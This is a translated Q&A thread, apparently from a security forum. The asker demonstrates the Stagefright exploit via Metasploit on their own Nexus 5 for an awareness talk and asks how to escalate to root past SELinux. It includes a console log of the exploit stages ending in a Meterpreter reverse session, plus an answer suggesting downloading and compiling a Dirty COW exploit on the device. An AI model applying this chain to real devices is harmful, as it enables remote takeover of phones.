web-dev-qa-db-ja.com

SELinux特権エスカレーションMetasploit Nexus 5 Android 5.0.1 Stagefright後のLRX22C

セキュリティ意識向上の日の一部を準備しています。「ショー」の一部はモバイルセキュリティに関するものでなければなりません。 stagefrightエクスプロイトを示すことを考えました。

それで、私はmetasploit-framework(Nexus 5)の最新のstagefright-moduleによってサポートされている携帯電話を取得することから始め、それをstagefright-vulnerability(Android 5.0.1 LRX22C)のバージョンにダウングレードして、悪用を開始しました。

すべて正常に動作します:

[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0x0, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102053 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0xb64f1cb0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102048 bytes) to 192.168.1.108:58971... (heap: 0xb3a2e980, code: 0xb64f1cb0 from SF)<br/>
[*] Transmitting intermediate stager...(136 bytes)<br/>
[*] Sending stage (397164 bytes) to 192.168.1.108<br/>
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.108:44680) at 2017-02-19 05:19:51 -0500<br/>

このセッションでは、私はかなりの助けとなり、無益です。私のUIDは1013です-これはメディアサーバーのUIDであると想定しています。興味のあるディレクトリやファイルへのアクセス権がありません(アクセス権がありません-私の番組には影響しません)。びっくりしました。この電話はSELinuxを使用していることに気づきました。私はグーグルにもっと特権を得る方法を尋ねることに決め、これを見つけました: CVE-2015-3864 Metasploit Module Drake別名jduckから。

彼はこのSELinux環境内でrootアクセスを取得するために、特別に細工された能力を使用しました。しかし、これは私がいくつかの助言/助けを必要とするものであることを認めざるを得ません。 mettle、pingpong、iovyrootを使用して、このようなマージされたペイロードをどのように構築しますか?
短い:オーディエンスに感動を与える何かを表示するために、この電話でより多くの権限またはrootを取得する方法を教えてください。

より正確な質問:
メトルペイロードをカスタマイズして、PingPong-rootおよびIovy-rootエクスプロイトを含めるにはどうすればよいですか?
(ルートアクセスを取得するためのペイロードの他のカスタマイズも歓迎です;))

2
Agent H.

Dirtycow カーネルの脆弱性を使用します。あなたがしたダウングレードで、私はカーネルがそれに脆弱であると思います。

Androidカーネルでも使用できます: Dirty Cow Android PoC

それに関するビデオの例: https://www.youtube.com/watch?v=4xdMteqm994

デバイスに入ったら、wgetまたはエクスプロイトを使用してダウンロードし、コンパイルしてルートを取得できます。カーネルをチェックして、脆弱かどうかを確認してください。

1
OscarAkaElvis